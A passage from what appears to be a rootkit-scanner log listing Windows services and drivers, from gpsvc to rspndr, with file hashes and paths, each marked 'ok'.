16:50:24.0459 5136 gpsvc (277bbc7e1aa1ee957f573a10eca7ef3a) C:\Windows\System32\gpsvc.dll
16:50:24.0459 5136 gpsvc - ok
16:50:24.0506 5136 hcw85cir (f2523ef6460fc42405b12248338ab2f0) C:\Windows\system32\drivers\hcw85cir.sys
16:50:24.0506 5136 hcw85cir - ok
16:50:24.0568 5136 HdAudAddService (975761c778e33cd22498059b91e7373a) C:\Windows\system32\drivers\HdAudio.sys
16:50:24.0568 5136 HdAudAddService - ok
16:50:24.0615 5136 HDAudBus (97bfed39b6b79eb12cddbfeed51f56bb) C:\Windows\system32\drivers\HDAudBus.sys
16:50:24.0615 5136 HDAudBus - ok
16:50:24.0631 5136 HidBatt (78e86380454a7b10a5eb255dc44a355f) C:\Windows\system32\DRIVERS\HidBatt.sys
16:50:24.0631 5136 HidBatt - ok
16:50:24.0662 5136 HidBth (7fd2a313f7afe5c4dab14798c48dd104) C:\Windows\system32\DRIVERS\hidbth.sys
16:50:24.0662 5136 HidBth - ok
16:50:24.0678 5136 HidIr (0a77d29f311b88cfae3b13f9c1a73825) C:\Windows\system32\DRIVERS\hidir.sys
16:50:24.0678 5136 HidIr - ok
16:50:24.0709 5136 hidserv (bd9eb3958f213f96b97b1d897dee006d) C:\Windows\System32\hidserv.dll
16:50:24.0709 5136 hidserv - ok
16:50:24.0756 5136 HidUsb (9592090a7e2b61cd582b612b6df70536) C:\Windows\system32\DRIVERS\hidusb.sys
16:50:24.0756 5136 HidUsb - ok
16:50:24.0787 5136 hkmsvc (387e72e739e15e3d37907a86d9ff98e2) C:\Windows\system32\kmsvc.dll
16:50:24.0787 5136 hkmsvc - ok
16:50:24.0834 5136 HomeGroupListener (efdfb3dd38a4376f93e7985173813abd) C:\Windows\system32\ListSvc.dll
16:50:24.0834 5136 HomeGroupListener - ok
16:50:24.0849 5136 HomeGroupProvider (908acb1f594274965a53926b10c81e89) C:\Windows\system32\provsvc.dll
16:50:24.0865 5136 HomeGroupProvider - ok
16:50:24.0912 5136 HpSAMD (39d2abcd392f3d8a6dce7b60ae7b8efc) C:\Windows\system32\drivers\HpSAMD.sys
16:50:24.0912 5136 HpSAMD - ok
16:50:24.0974 5136 HTTP (0ea7de1acb728dd5a369fd742d6eee28) C:\Windows\system32\drivers\HTTP.sys
16:50:24.0974 5136 HTTP - ok
16:50:25.0021 5136 hwpolicy (a5462bd6884960c9dc85ed49d34ff392) C:\Windows\system32\drivers\hwpolicy.sys
16:50:25.0021 5136 hwpolicy - ok
16:50:25.0052 5136 i8042prt (fa55c73d4affa7ee23ac4be53b4592d3) C:\Windows\system32\drivers\i8042prt.sys
16:50:25.0052 5136 i8042prt - ok
16:50:25.0099 5136 iaStorV (aaaf44db3bd0b9d1fb6969b23ecc8366) C:\Windows\system32\drivers\iaStorV.sys
16:50:25.0099 5136 iaStorV - ok
16:50:25.0161 5136 idsvc (5988fc40f8db5b0739cd1e3a5d0d78bd) C:\Windows\Microsoft.NET\Framework64\v3.0\Windows Communication Foundation\infocard.exe
16:50:25.0177 5136 idsvc - ok
16:50:25.0224 5136 iirsp (5c18831c61933628f5bb0ea2675b9d21) C:\Windows\system32\DRIVERS\iirsp.sys
16:50:25.0239 5136 iirsp - ok
16:50:25.0286 5136 IKEEXT (fcd84c381e0140af901e58d48882d26b) C:\Windows\System32\ikeext.dll
16:50:25.0302 5136 IKEEXT - ok
16:50:25.0333 5136 intelide (f00f20e70c6ec3aa366910083a0518aa) C:\Windows\system32\drivers\intelide.sys
16:50:25.0333 5136 intelide - ok
16:50:25.0380 5136 intelppm (ada036632c664caa754079041cf1f8c1) C:\Windows\system32\DRIVERS\intelppm.sys
16:50:25.0380 5136 intelppm - ok
16:50:25.0411 5136 IPBusEnum (098a91c54546a3b878dad6a7e90a455b) C:\Windows\system32\ipbusenum.dll
16:50:25.0411 5136 IPBusEnum - ok
16:50:25.0442 5136 IpFilterDriver (c9f0e1bd74365a8771590e9008d22ab6) C:\Windows\system32\DRIVERS\ipfltdrv.sys
16:50:25.0442 5136 IpFilterDriver - ok
16:50:25.0504 5136 iphlpsvc (a34a587fffd45fa649fba6d03784d257) C:\Windows\System32\iphlpsvc.dll
16:50:25.0520 5136 iphlpsvc - ok
16:50:25.0582 5136 IPMIDRV (0fc1aea580957aa8817b8f305d18ca3a) C:\Windows\system32\drivers\IPMIDrv.sys
16:50:25.0582 5136 IPMIDRV - ok
16:50:25.0629 5136 IPNAT (af9b39a7e7b6caa203b3862582e9f2d0) C:\Windows\system32\drivers\ipnat.sys
16:50:25.0629 5136 IPNAT - ok
16:50:25.0676 5136 IRENUM (3abf5e7213eb28966d55d58b515d5ce9) C:\Windows\system32\drivers\irenum.sys
16:50:25.0676 5136 IRENUM - ok
16:50:25.0707 5136 isapnp (2f7b28dc3e1183e5eb418df55c204f38) C:\Windows\system32\drivers\isapnp.sys
16:50:25.0707 5136 isapnp - ok
16:50:25.0738 5136 iScsiPrt (d931d7309deb2317035b07c9f9e6b0bd) C:\Windows\system32\drivers\msiscsi.sys
16:50:25.0738 5136 iScsiPrt - ok
16:50:25.0770 5136 kbdclass (bc02336f1cba7dcc7d1213bb588a68a5) C:\Windows\system32\DRIVERS\kbdclass.sys
16:50:25.0770 5136 kbdclass - ok
16:50:25.0801 5136 kbdhid (0705eff5b42a9db58548eec3b26bb484) C:\Windows\system32\DRIVERS\kbdhid.sys
16:50:25.0816 5136 kbdhid - ok
16:50:25.0848 5136 KeyIso (c118a82cd78818c29ab228366ebf81c3) C:\Windows\system32\lsass.exe
16:50:25.0848 5136 KeyIso - ok
16:50:25.0972 5136 kinonivd (22246d979e88e934a92e01d650880179) C:\Windows\system32\DRIVERS\kinonivd.sys
16:50:26.0004 5136 kinonivd - ok
16:50:26.0082 5136 KINONI_Wave (04e692184d6cc63fec9a9343fc1df421) C:\Windows\system32\drivers\kinonivad.sys
16:50:26.0082 5136 KINONI_Wave - ok
16:50:26.0144 5136 KSecDD (da1e991a61cfdd755a589e206b97644b) C:\Windows\system32\Drivers\ksecdd.sys
16:50:26.0144 5136 KSecDD - ok
16:50:26.0160 5136 KSecPkg (7e33198d956943a4f11a5474c1e9106f) C:\Windows\system32\Drivers\ksecpkg.sys
16:50:26.0175 5136 KSecPkg - ok
16:50:26.0222 5136 ksthunk (6869281e78cb31a43e969f06b57347c4) C:\Windows\system32\drivers\ksthunk.sys
16:50:26.0222 5136 ksthunk - ok
16:50:26.0253 5136 KtmRm (6ab66e16aa859232f64deb66887a8c9c) C:\Windows\system32\msdtckrm.dll
16:50:26.0253 5136 KtmRm - ok
16:50:26.0316 5136 LanmanServer (d9f42719019740baa6d1c6d536cbdaa6) C:\Windows\System32\srvsvc.dll
16:50:26.0316 5136 LanmanServer - ok
16:50:26.0378 5136 LanmanWorkstation (851a1382eed3e3a7476db004f4ee3e1a) C:\Windows\System32\wkssvc.dll
16:50:26.0378 5136 LanmanWorkstation - ok
16:50:26.0425 5136 lltdio (1538831cf8ad2979a04c423779465827) C:\Windows\system32\DRIVERS\lltdio.sys
16:50:26.0425 5136 lltdio - ok
16:50:26.0472 5136 lltdsvc (c1185803384ab3feed115f79f109427f) C:\Windows\System32\lltdsvc.dll
16:50:26.0472 5136 lltdsvc - ok
16:50:26.0503 5136 lmhosts (f993a32249b66c9d622ea5592a8b76b8) C:\Windows\System32\lmhsvc.dll
16:50:26.0503 5136 lmhosts - ok
16:50:26.0550 5136 LSI_FC (1a93e54eb0ece102495a51266dcdb6a6) C:\Windows\system32\DRIVERS\lsi_fc.sys
16:50:26.0550 5136 LSI_FC - ok
16:50:26.0581 5136 LSI_SAS (1047184a9fdc8bdbff857175875ee810) C:\Windows\system32\DRIVERS\lsi_sas.sys
16:50:26.0581 5136 LSI_SAS - ok
16:50:26.0596 5136 LSI_SAS2 (30f5c0de1ee8b5bc9306c1f0e4a75f93) C:\Windows\system32\DRIVERS\lsi_sas2.sys
16:50:26.0596 5136 LSI_SAS2 - ok
16:50:26.0612 5136 LSI_SCSI (0504eacaff0d3c8aed161c4b0d369d4a) C:\Windows\system32\DRIVERS\lsi_scsi.sys
16:50:26.0612 5136 LSI_SCSI - ok
16:50:26.0628 5136 luafv (43d0f98e1d56ccddb0d5254cff7b356e) C:\Windows\system32\drivers\luafv.sys
16:50:26.0628 5136 luafv - ok
16:50:26.0674 5136 ManyCam (922cbac7b992b9614cab7122f4bf9406) C:\Windows\system32\DRIVERS\mcvidrv_x64.sys
16:50:26.0674 5136 ManyCam - ok
16:50:26.0768 5136 MBAMProtector (dbc08862a71459e74f7538b432c114cc) C:\Windows\system32\drivers\mbam.sys
16:50:26.0768 5136 MBAMProtector - ok
16:50:26.0877 5136 MBAMService (ba400ed640bca1eae5c727ae17c10207) C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamservice.exe
16:50:26.0893 5136 MBAMService - ok
16:50:26.0986 5136 mcaudrv_simple (34a42dd7cf525d0d2c5232916496e4b8) C:\Windows\system32\drivers\mcaudrv_x64.sys
16:50:26.0986 5136 mcaudrv_simple - ok
16:50:27.0018 5136 mcdbus (79d51e7f5926e8ce1b3ebecebae28cff) C:\Windows\system32\DRIVERS\mcdbus.sys
16:50:27.0033 5136 mcdbus - ok
16:50:27.0049 5136 Mcx2Svc (0be09cd858abf9df6ed259d57a1a1663) C:\Windows\system32\Mcx2Svc.dll
16:50:27.0064 5136 Mcx2Svc - ok
16:50:27.0096 5136 megasas (a55805f747c6edb6a9080d7c633bd0f4) C:\Windows\system32\DRIVERS\megasas.sys
16:50:27.0096 5136 megasas - ok
16:50:27.0127 5136 MegaSR (baf74ce0072480c3b6b7c13b2a94d6b3) C:\Windows\system32\DRIVERS\MegaSR.sys
16:50:27.0142 5136 MegaSR - ok
16:50:27.0158 5136 MMCSS (e40e80d0304a73e8d269f7141d77250b) C:\Windows\system32\mmcss.dll
16:50:27.0174 5136 MMCSS - ok
16:50:27.0174 5136 Modem (800ba92f7010378b09f9ed9270f07137) C:\Windows\system32\drivers\modem.sys
16:50:27.0189 5136 Modem - ok
16:50:27.0205 5136 monitor (b03d591dc7da45ece20b3b467e6aadaa) C:\Windows\system32\DRIVERS\monitor.sys
16:50:27.0205 5136 monitor - ok
16:50:27.0252 5136 motandroidusb (d69f1e9a944a5f46a494af901ed41118) C:\Windows\system32\Drivers\motoandroid.sys
16:50:27.0267 5136 motandroidusb - ok
16:50:27.0314 5136 motccgp (85198fb1e5cc4a9db03443a385ea0ad2) C:\Windows\system32\DRIVERS\motccgp.sys
16:50:27.0314 5136 motccgp - ok
16:50:27.0345 5136 motccgpfl (577399c75cf85ac68e7830eb150f45ef) C:\Windows\system32\DRIVERS\motccgpfl.sys
16:50:27.0345 5136 motccgpfl - ok
16:50:27.0408 5136 motmodem (0ef6b989af403c1c1b6ebcbd2a280612) C:\Windows\system32\DRIVERS\motmodem.sys
16:50:27.0408 5136 motmodem - ok
16:50:27.0501 5136 MotoHelper (290750346f5937b02f62594b8eb03215) C:\Program Files (x86)\Motorola\MotoHelper\MotoHelperService.exe
16:50:27.0517 5136 MotoHelper - ok
16:50:27.0548 5136 MotoSwitchService (ebd05f60cafc5bba2602b8d7101082d3) C:\Windows\system32\DRIVERS\motswch.sys
16:50:27.0548 5136 MotoSwitchService - ok
16:50:27.0564 5136 Motousbnet (7e1bd35249f4d5a745144b3c77f9fb85) C:\Windows\system32\DRIVERS\Motousbnet.sys
16:50:27.0579 5136 Motousbnet - ok
16:50:27.0610 5136 mouclass (7d27ea49f3c1f687d357e77a470aea99) C:\Windows\system32\DRIVERS\mouclass.sys
16:50:27.0610 5136 mouclass - ok
16:50:27.0673 5136 mouhid (d3bf052c40b0c4166d9fd86a4288c1e6) C:\Windows\system32\DRIVERS\mouhid.sys
16:50:27.0673 5136 mouhid - ok
16:50:27.0704 5136 mountmgr (32e7a3d591d671a6df2db515a5cbe0fa) C:\Windows\system32\drivers\mountmgr.sys
16:50:27.0704 5136 mountmgr - ok
16:50:27.0766 5136 mpio (a44b420d30bd56e145d6a2bc8768ec58) C:\Windows\system32\drivers\mpio.sys
16:50:27.0766 5136 mpio - ok
16:50:27.0798 5136 mpsdrv (6c38c9e45ae0ea2fa5e551f2ed5e978f) C:\Windows\system32\drivers\mpsdrv.sys
16:50:27.0798 5136 mpsdrv - ok
16:50:27.0829 5136 MpsSvc (54ffc9c8898113ace189d4aa7199d2c1) C:\Windows\system32\mpssvc.dll
16:50:27.0844 5136 MpsSvc - ok
16:50:27.0907 5136 MRxDAV (dc722758b8261e1abafd31a3c0a66380) C:\Windows\system32\drivers\mrxdav.sys
16:50:27.0907 5136 MRxDAV - ok
16:50:27.0938 5136 mrxsmb (a5d9106a73dc88564c825d317cac68ac) C:\Windows\system32\DRIVERS\mrxsmb.sys
16:50:27.0938 5136 mrxsmb - ok
16:50:27.0969 5136 mrxsmb10 (d711b3c1d5f42c0c2415687be09fc163) C:\Windows\system32\DRIVERS\mrxsmb10.sys
16:50:27.0969 5136 mrxsmb10 - ok
16:50:27.0985 5136 mrxsmb20 (9423e9d355c8d303e76b8cfbd8a5c30c) C:\Windows\system32\DRIVERS\mrxsmb20.sys
16:50:27.0985 5136 mrxsmb20 - ok
16:50:27.0985 5136 msahci (c25f0bafa182cbca2dd3c851c2e75796) C:\Windows\system32\drivers\msahci.sys
16:50:27.0985 5136 msahci - ok
16:50:28.0000 5136 msdsm (db801a638d011b9633829eb6f663c900) C:\Windows\system32\drivers\msdsm.sys
16:50:28.0000 5136 msdsm - ok
16:50:28.0032 5136 MSDTC (de0ece52236cfa3ed2dbfc03f28253a8) C:\Windows\System32\msdtc.exe
16:50:28.0047 5136 MSDTC - ok
16:50:28.0110 5136 Msfs (aa3fb40e17ce1388fa1bedab50ea8f96) C:\Windows\system32\drivers\Msfs.sys
16:50:28.0110 5136 Msfs - ok
16:50:28.0141 5136 mshidkmdf (f9d215a46a8b9753f61767fa72a20326) C:\Windows\System32\drivers\mshidkmdf.sys
16:50:28.0141 5136 mshidkmdf - ok
16:50:28.0156 5136 msisadrv (d916874bbd4f8b07bfb7fa9b3ccae29d) C:\Windows\system32\drivers\msisadrv.sys
16:50:28.0156 5136 msisadrv - ok
16:50:28.0203 5136 MSiSCSI (808e98ff49b155c522e6400953177b08) C:\Windows\system32\iscsiexe.dll
16:50:28.0203 5136 MSiSCSI - ok
16:50:28.0234 5136 msiserver - ok
16:50:28.0266 5136 MSKSSRV (49ccf2c4fea34ffad8b1b59d49439366) C:\Windows\system32\drivers\MSKSSRV.sys
16:50:28.0266 5136 MSKSSRV - ok
16:50:28.0281 5136 MSPCLOCK (bdd71ace35a232104ddd349ee70e1ab3) C:\Windows\system32\drivers\MSPCLOCK.sys
16:50:28.0281 5136 MSPCLOCK - ok
16:50:28.0297 5136 MSPQM (4ed981241db27c3383d72092b618a1d0) C:\Windows\system32\drivers\MSPQM.sys
16:50:28.0297 5136 MSPQM - ok
16:50:28.0328 5136 MsRPC (759a9eeb0fa9ed79da1fb7d4ef78866d) C:\Windows\system32\drivers\MsRPC.sys
16:50:28.0344 5136 MsRPC - ok
16:50:28.0375 5136 mssmbios (0eed230e37515a0eaee3c2e1bc97b288) C:\Windows\system32\drivers\mssmbios.sys
16:50:28.0375 5136 mssmbios - ok
16:50:28.0390 5136 MSTEE (2e66f9ecb30b4221a318c92ac2250779) C:\Windows\system32\drivers\MSTEE.sys
16:50:28.0390 5136 MSTEE - ok
16:50:28.0437 5136 MTConfig (7ea404308934e675bffde8edf0757bcd) C:\Windows\system32\DRIVERS\MTConfig.sys
16:50:28.0437 5136 MTConfig - ok
16:50:28.0484 5136 Mup (f9a18612fd3526fe473c1bda678d61c8) C:\Windows\system32\Drivers\mup.sys
16:50:28.0484 5136 Mup - ok
16:50:28.0515 5136 napagent (582ac6d9873e31dfa28a4547270862dd) C:\Windows\system32\qagentRT.dll
16:50:28.0531 5136 napagent - ok
16:50:28.0593 5136 NativeWifiP (1ea3749c4114db3e3161156ffffa6b33) C:\Windows\system32\DRIVERS\nwifi.sys
16:50:28.0593 5136 NativeWifiP - ok
16:50:28.0640 5136 NDIS (79b47fd40d9a817e932f9d26fac0a81c) C:\Windows\system32\drivers\ndis.sys
16:50:28.0656 5136 NDIS - ok
16:50:28.0702 5136 NdisCap (9f9a1f53aad7da4d6fef5bb73ab811ac) C:\Windows\system32\DRIVERS\ndiscap.sys
16:50:28.0702 5136 NdisCap - ok
16:50:28.0749 5136 NdisTapi (30639c932d9fef22b31268fe25a1b6e5) C:\Windows\system32\DRIVERS\ndistapi.sys
16:50:28.0749 5136 NdisTapi - ok
16:50:28.0765 5136 Ndisuio (136185f9fb2cc61e573e676aa5402356) C:\Windows\system32\DRIVERS\ndisuio.sys
16:50:28.0765 5136 Ndisuio - ok
16:50:28.0780 5136 NdisWan (53f7305169863f0a2bddc49e116c2e11) C:\Windows\system32\DRIVERS\ndiswan.sys
16:50:28.0780 5136 NdisWan - ok
16:50:28.0812 5136 NDProxy (015c0d8e0e0421b4cfd48cffe2825879) C:\Windows\system32\drivers\NDProxy.sys
16:50:28.0812 5136 NDProxy - ok
16:50:28.0843 5136 NetBIOS (86743d9f5d2b1048062b14b1d84501c4) C:\Windows\system32\DRIVERS\netbios.sys
16:50:28.0843 5136 NetBIOS - ok
16:50:28.0874 5136 NetBT (09594d1089c523423b32a4229263f068) C:\Windows\system32\DRIVERS\netbt.sys
16:50:28.0874 5136 NetBT - ok
16:50:28.0921 5136 Netlogon (c118a82cd78818c29ab228366ebf81c3) C:\Windows\system32\lsass.exe
16:50:28.0921 5136 Netlogon - ok
16:50:28.0952 5136 Netman (847d3ae376c0817161a14a82c8922a9e) C:\Windows\System32\netman.dll
16:50:28.0952 5136 Netman - ok
16:50:28.0983 5136 netprofm (5f28111c648f1e24f7dbc87cdeb091b8) C:\Windows\System32\netprofm.dll
16:50:28.0999 5136 netprofm - ok
16:50:29.0061 5136 NetTcpPortSharing (3e5a36127e201ddf663176b66828fafe) C:\Windows\Microsoft.NET\Framework64\v3.0\Windows Communication Foundation\SMSvcHost.exe
16:50:29.0077 5136 NetTcpPortSharing - ok
16:50:29.0248 5136 NETw5s64 (39ede676d17f37af4573c2b33ec28aca) C:\Windows\system32\DRIVERS\NETw5s64.sys
16:50:29.0326 5136 NETw5s64 - ok
16:50:29.0420 5136 nfrd960 (77889813be4d166cdab78ddba990da92) C:\Windows\system32\DRIVERS\nfrd960.sys
16:50:29.0420 5136 nfrd960 - ok
16:50:29.0467 5136 NlaSvc (1ee99a89cc788ada662441d1e9830529) C:\Windows\System32\nlasvc.dll
16:50:29.0482 5136 NlaSvc - ok
16:50:29.0529 5136 NMgamingmsFltr (fbca3fd51604147770eb4fb53d6144a8) C:\Windows\system32\drivers\NMgamingms.sys
16:50:29.0529 5136 NMgamingmsFltr - ok
16:50:29.0545 5136 Npfs (1e4c4ab5c9b8dd13179bbdc75a2a01f7) C:\Windows\system32\drivers\Npfs.sys
16:50:29.0545 5136 Npfs - ok
16:50:29.0576 5136 nsi (d54bfdf3e0c953f823b3d0bfe4732528) C:\Windows\system32\nsisvc.dll
16:50:29.0576 5136 nsi - ok
16:50:29.0592 5136 nsiproxy (e7f5ae18af4168178a642a9247c63001) C:\Windows\system32\drivers\nsiproxy.sys
16:50:29.0592 5136 nsiproxy - ok
16:50:29.0654 5136 Ntfs (a2f74975097f52a00745f9637451fdd8) C:\Windows\system32\drivers\Ntfs.sys
16:50:29.0685 5136 Ntfs - ok
16:50:29.0763 5136 Null (9899284589f75fa8724ff3d16aed75c1) C:\Windows\system32\drivers\Null.sys
16:50:29.0763 5136 Null - ok
16:50:29.0826 5136 NVHDA (8d4aac74b571fc356560e5b308955e93) C:\Windows\system32\drivers\nvhda64v.sys
16:50:29.0826 5136 NVHDA - ok
16:50:30.0184 5136 nvlddmkm (0eb204639119370f5f8f2871fbf4e14b) C:\Windows\system32\DRIVERS\nvlddmkm.sys
16:50:30.0496 5136 nvlddmkm - ok
16:50:30.0590 5136 nvraid (0a92cb65770442ed0dc44834632f66ad) C:\Windows\system32\drivers\nvraid.sys
16:50:30.0590 5136 nvraid - ok
16:50:30.0621 5136 nvstor (dab0e87525c10052bf65f06152f37e4a) C:\Windows\system32\drivers\nvstor.sys
16:50:30.0621 5136 nvstor - ok
16:50:30.0684 5136 nvsvc (32ff8ee6dcee5c0cb91ff892fb1ca364) C:\Windows\system32\nvvsvc.exe
16:50:30.0699 5136 nvsvc - ok
16:50:30.0840 5136 nvUpdatusService (bd012dc22c78be1071bc21eb125d782f) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe
16:50:30.0840 5136 nvUpdatusService - ok
16:50:30.0933 5136 nv_agp (270d7cd42d6e3979f6dd0146650f0e05) C:\Windows\system32\drivers\nv_agp.sys
16:50:30.0949 5136 nv_agp - ok
16:50:30.0980 5136 ohci1394 (3589478e4b22ce21b41fa1bfc0b8b8a0) C:\Windows\system32\drivers\ohci1394.sys
16:50:30.0980 5136 ohci1394 - ok
16:50:31.0027 5136 ose (9d10f99a6712e28f8acd5641e3a7ea6b) C:\Program Files (x86)\Common Files\Microsoft Shared\Source Engine\OSE.EXE
16:50:31.0027 5136 ose - ok
16:50:31.0167 5136 osppsvc (61bffb5f57ad12f83ab64b7181829b34) C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
16:50:31.0230 5136 osppsvc - ok
16:50:31.0323 5136 p2pimsvc (3eac4455472cc2c97107b5291e0dcafe) C:\Windows\system32\pnrpsvc.dll
16:50:31.0323 5136 p2pimsvc - ok
16:50:31.0354 5136 p2psvc (927463ecb02179f88e4b9a17568c63c3) C:\Windows\system32\p2psvc.dll
16:50:31.0370 5136 p2psvc - ok
16:50:31.0401 5136 Parport (0086431c29c35be1dbc43f52cc273887) C:\Windows\system32\DRIVERS\parport.sys
16:50:31.0401 5136 Parport - ok
16:50:31.0448 5136 partmgr (871eadac56b0a4c6512bbe32753ccf79) C:\Windows\system32\drivers\partmgr.sys
16:50:31.0448 5136 partmgr - ok
16:50:31.0464 5136 PcaSvc (3aeaa8b561e63452c655dc0584922257) C:\Windows\System32\pcasvc.dll
16:50:31.0464 5136 PcaSvc - ok
16:50:31.0479 5136 pci (94575c0571d1462a0f70bde6bd6ee6b3) C:\Windows\system32\drivers\pci.sys
16:50:31.0479 5136 pci - ok
16:50:31.0510 5136 pciide (b5b8b5ef2e5cb34df8dcf8831e3534fa) C:\Windows\system32\drivers\pciide.sys
16:50:31.0510 5136 pciide - ok
16:50:31.0526 5136 pcmcia (b2e81d4e87ce48589f98cb8c05b01f2f) C:\Windows\system32\DRIVERS\pcmcia.sys
16:50:31.0526 5136 pcmcia - ok
16:50:31.0542 5136 pcw (d6b9c2e1a11a3a4b26a182ffef18f603) C:\Windows\system32\drivers\pcw.sys
16:50:31.0542 5136 pcw - ok
16:50:31.0588 5136 PEAUTH (68769c3356b3be5d1c732c97b9a80d6e) C:\Windows\system32\drivers\peauth.sys
16:50:31.0588 5136 PEAUTH - ok
16:50:31.0698 5136 PeerDistSvc (b9b0a4299dd2d76a4243f75fd54dc680) C:\Windows\system32\peerdistsvc.dll
16:50:31.0729 5136 PeerDistSvc - ok
16:50:31.0807 5136 PerfHost (e495e408c93141e8fc72dc0c6046ddfa) C:\Windows\SysWow64\perfhost.exe
16:50:31.0807 5136 PerfHost - ok
16:50:31.0869 5136 pla (c7cf6a6e137463219e1259e3f0f0dd6c) C:\Windows\system32\pla.dll
16:50:31.0885 5136 pla - ok
16:50:31.0978 5136 PlugPlay (25fbdef06c4d92815b353f6e792c8129) C:\Windows\system32\umpnpmgr.dll
16:50:31.0994 5136 PlugPlay - ok
16:50:32.0010 5136 PnkBstrA - ok
16:50:32.0041 5136 PNRPAutoReg (7195581cec9bb7d12abe54036acc2e38) C:\Windows\system32\pnrpauto.dll
16:50:32.0041 5136 PNRPAutoReg - ok
16:50:32.0072 5136 PNRPsvc (3eac4455472cc2c97107b5291e0dcafe) C:\Windows\system32\pnrpsvc.dll
16:50:32.0072 5136 PNRPsvc - ok
16:50:32.0103 5136 PolicyAgent (4f15d75adf6156bf56eced6d4a55c389) C:\Windows\System32\ipsecsvc.dll
16:50:32.0103 5136 PolicyAgent - ok
16:50:32.0134 5136 Power (6ba9d927dded70bd1a9caded45f8b184) C:\Windows\system32\umpo.dll
16:50:32.0134 5136 Power - ok
16:50:32.0212 5136 PptpMiniport (f92a2c41117a11a00be01ca01a7fcde9) C:\Windows\system32\DRIVERS\raspptp.sys
16:50:32.0212 5136 PptpMiniport - ok
16:50:32.0275 5136 Processor (0d922e23c041efb1c3fac2a6f943c9bf) C:\Windows\system32\DRIVERS\processr.sys
16:50:32.0290 5136 Processor - ok
16:50:32.0306 5136 ProfSvc (5c78838b4d166d1a27db3a8a820c799a) C:\Windows\system32\profsvc.dll
16:50:32.0306 5136 ProfSvc - ok
16:50:32.0337 5136 ProtectedStorage (c118a82cd78818c29ab228366ebf81c3) C:\Windows\system32\lsass.exe
16:50:32.0337 5136 ProtectedStorage - ok
16:50:32.0384 5136 Psched (0557cf5a2556bd58e26384169d72438d) C:\Windows\system32\DRIVERS\pacer.sys
16:50:32.0384 5136 Psched - ok
16:50:32.0415 5136 ql2300 (a53a15a11ebfd21077463ee2c7afeef0) C:\Windows\system32\DRIVERS\ql2300.sys
16:50:32.0446 5136 ql2300 - ok
16:50:32.0462 5136 ql40xx (4f6d12b51de1aaeff7dc58c4d75423c8) C:\Windows\system32\DRIVERS\ql40xx.sys
16:50:32.0462 5136 ql40xx - ok
16:50:32.0493 5136 QWAVE (906191634e99aea92c4816150bda3732) C:\Windows\system32\qwave.dll
16:50:32.0493 5136 QWAVE - ok
16:50:32.0571 5136 QWAVEdrv (76707bb36430888d9ce9d705398adb6c) C:\Windows\system32\drivers\qwavedrv.sys
16:50:32.0571 5136 QWAVEdrv - ok
16:50:32.0602 5136 RasAcd (5a0da8ad5762fa2d91678a8a01311704) C:\Windows\system32\DRIVERS\rasacd.sys
16:50:32.0602 5136 RasAcd - ok
16:50:32.0634 5136 RasAgileVpn (7ecff9b22276b73f43a99a15a6094e90) C:\Windows\system32\DRIVERS\AgileVpn.sys
16:50:32.0634 5136 RasAgileVpn - ok
16:50:32.0649 5136 RasAuto (8f26510c5383b8dbe976de1cd00fc8c7) C:\Windows\System32\rasauto.dll
16:50:32.0665 5136 RasAuto - ok
16:50:32.0680 5136 Rasl2tp (471815800ae33e6f1c32fb1b97c490ca) C:\Windows\system32\DRIVERS\rasl2tp.sys
16:50:32.0680 5136 Rasl2tp - ok
16:50:32.0712 5136 RasMan (ee867a0870fc9e4972ba9eaad35651e2) C:\Windows\System32\rasmans.dll
16:50:32.0727 5136 RasMan - ok
16:50:32.0727 5136 RasPppoe (855c9b1cd4756c5e9a2aa58a15f58c25) C:\Windows\system32\DRIVERS\raspppoe.sys
16:50:32.0727 5136 RasPppoe - ok
16:50:32.0758 5136 RasSstp (e8b1e447b008d07ff47d016c2b0eeecb) C:\Windows\system32\DRIVERS\rassstp.sys
16:50:32.0758 5136 RasSstp - ok
16:50:32.0774 5136 rdbss (77f665941019a1594d887a74f301fa2f) C:\Windows\system32\DRIVERS\rdbss.sys
16:50:32.0774 5136 rdbss - ok
16:50:32.0790 5136 rdpbus (302da2a0539f2cf54d7c6cc30c1f2d8d) C:\Windows\system32\DRIVERS\rdpbus.sys
16:50:32.0790 5136 rdpbus - ok
16:50:32.0805 5136 RDPCDD (cea6cc257fc9b7715f1c2b4849286d24) C:\Windows\system32\DRIVERS\RDPCDD.sys
16:50:32.0805 5136 RDPCDD - ok
16:50:32.0836 5136 RDPDR (1b6163c503398b23ff8b939c67747683) C:\Windows\system32\drivers\rdpdr.sys
16:50:32.0836 5136 RDPDR - ok
16:50:32.0852 5136 RDPENCDD (bb5971a4f00659529a5c44831af22365) C:\Windows\system32\drivers\rdpencdd.sys
16:50:32.0852 5136 RDPENCDD - ok
16:50:32.0868 5136 RDPREFMP (216f3fa57533d98e1f74ded70113177a) C:\Windows\system32\drivers\rdprefmp.sys
16:50:32.0868 5136 RDPREFMP - ok
16:50:32.0930 5136 RdpVideoMiniport (70cba1a0c98600a2aa1863479b35cb90) C:\Windows\system32\drivers\rdpvideominiport.sys
16:50:32.0930 5136 RdpVideoMiniport - ok
16:50:33.0024 5136 RDPWD (6d76e6433574b058adcb0c50df834492) C:\Windows\system32\drivers\RDPWD.sys
16:50:33.0039 5136 RDPWD - ok
16:50:33.0070 5136 rdyboost (34ed295fa0121c241bfef24764fc4520) C:\Windows\system32\drivers\rdyboost.sys
16:50:33.0070 5136 rdyboost - ok
16:50:33.0102 5136 RemoteAccess (254fb7a22d74e5511c73a3f6d802f192) C:\Windows\System32\mprdim.dll
16:50:33.0102 5136 RemoteAccess - ok
16:50:33.0117 5136 RemoteRegistry (e4d94f24081440b5fc5aa556c7c62702) C:\Windows\system32\regsvc.dll
16:50:33.0133 5136 RemoteRegistry - ok
16:50:33.0148 5136 RpcEptMapper (e4dc58cf7b3ea515ae917ff0d402a7bb) C:\Windows\System32\RpcEpMap.dll
16:50:33.0148 5136 RpcEptMapper - ok
16:50:33.0164 5136 RpcLocator (d5ba242d4cf8e384db90e6a8ed850b8c) C:\Windows\system32\locator.exe
16:50:33.0164 5136 RpcLocator - ok
16:50:33.0211 5136 RpcSs (5c627d1b1138676c0a7ab2c2c190d123) C:\Windows\system32\rpcss.dll
16:50:33.0211 5136 RpcSs - ok
16:50:33.0242 5136 rspndr (ddc86e4f8e7456261e637e3552e804ff) C:\Windows\system32\DRIVERS\rspndr.sys
16:50:33.0242 5136 rspndr - ok
